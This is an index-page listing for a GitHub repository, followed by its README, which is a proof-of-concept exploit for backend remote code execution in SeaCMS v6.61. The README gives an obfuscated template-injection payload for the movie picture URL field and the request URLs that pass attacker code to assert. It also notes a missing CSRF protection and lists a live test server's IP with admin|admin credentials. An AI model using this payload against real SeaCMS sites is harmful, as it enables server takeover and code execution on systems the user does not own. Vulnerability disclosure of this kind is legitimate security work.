Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/imagemlt/seacms
exp
https://github.com/imagemlt/seacms
Last synced: about 9 hours ago
JSON representation
exp
- Host: GitHub
- URL: https://github.com/imagemlt/seacms
- Owner: imagemlt
- Created: 2018-07-18T08:29:17.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2018-07-18T08:33:21.000Z (over 6 years ago)
- Last Synced: 2023-10-19T19:10:26.061Z (about 1 year ago)
- Language: HTML
- Size: 1000 Bytes
- Stars: 2
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
README
# backend RCE in the latest version of SeaCMS(v6.61)
In SeaCMS's admin platform, just in the page of publishing movies,due to the low limitation of the code injected in the picture's url,we can execute random code to getshell.though there are some way's in the /include/main.class to limit the usage of the code,we can find ways to bypass it.
So How does this vul be triggerd? here are some Steps:
* Firstly login to the admin panel, in this case the admin directory is adjusted to `/backend`.
* Secondly add a movie and set it's pictrue address as `{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}`
* After adding it visit `/details/index.php?1.html&m=admin&a=assert&b=phpinfo();`you can find `phpinfo()` is executed.
here 1.html refers to the id of the video you have just added.In my case, the video's id is 2 so I executed as 2.html.
* Or you can just visit `/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();`or any other places that display the video's pic you have just added.
Also in the adding movie page it has no csrf protection so we can use CSRF to attacked it.
csrf poc is here:
```html
history.pushState('', '', '/')
```
you can test this vul at `http://111.230.11.248:10089/backend/`,and the username and password is admin|admin.